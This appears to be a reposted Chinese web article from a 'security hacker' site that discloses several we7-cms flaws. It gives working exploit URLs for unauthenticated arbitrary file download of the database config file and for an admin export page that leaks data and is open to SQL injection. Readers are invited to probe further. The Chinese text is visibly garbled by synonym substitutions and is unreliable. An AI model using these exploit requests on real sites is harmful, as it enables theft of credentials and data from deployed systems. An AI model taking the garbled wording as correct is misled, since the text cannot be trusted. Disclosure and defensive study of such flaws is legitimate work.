安全黑客
当前位置:安全黑客文章资讯安全漏洞最新漏洞
日期:2010-12-16 00:36:00  来源:本站整理

we7-cms多处漏洞[最新漏洞]

赞助商链接



  本文“we7-cms多处漏洞[最新漏洞]”是由安全黑客为您精心收集,来源于网络转载,文章版权归文章作者所有,本站不对其观点以及内容做任何评价,请读者自行判断,以下是其具体内容:

公布日期:2010-12.15
公布作者:jannock

影响版本:全部
官方网站:http:/www.westengine.com

漏洞范例:SQL注入
漏洞描写:

下载了一下最新版,居现错漏百出...但案例中央利用的很多是政府、教诲等单位.仿佛很牛叉,看来又是有后台的人物.

漏洞1、载肆意文件下载

EXP:http://www.hackbt.com/admin/download.aspx?url=~/config/db.config

直接下载肆意文件.
(你没看错,是后台地址,他们的考证方法....)


漏洞2、文件泄露

EXP:http://www.hackbt.com/admin/VisualTemplate/Export.aspx
导出并打包肆意数据,并且还存在SQL注入.
SELECT * FROM [aa']
对象名 'aa'' 无效.
(也没看错,也是后台地址)

别的:

近似上面的漏洞的有很多,他们大部份页面没有考证权限,直接可以拜候履行.会员中央仿佛还存在上传漏洞.大家渐渐研究吧...
 


  以上是“we7-cms多处漏洞[最新漏洞]”的内容,如果你对以上该文章内容感兴趣,你可以看看安全黑客为您推荐以下文章:
  • we7-cms多处漏洞
  • 本文地址: 与您的QQ/BBS好友分享!

    文章评论评论内容只代表网友观点,与本站立场无关!

       评论摘要(共 0 条,得分 0 分,平均 0 分) 查看完整评论
    免责条款 - 广告合作 - 下载声明 - 欢迎投稿 - 友情连接 - 网站地图 -
    Copyright © 2012-2013 www.110hack.com. All Rights Reserved .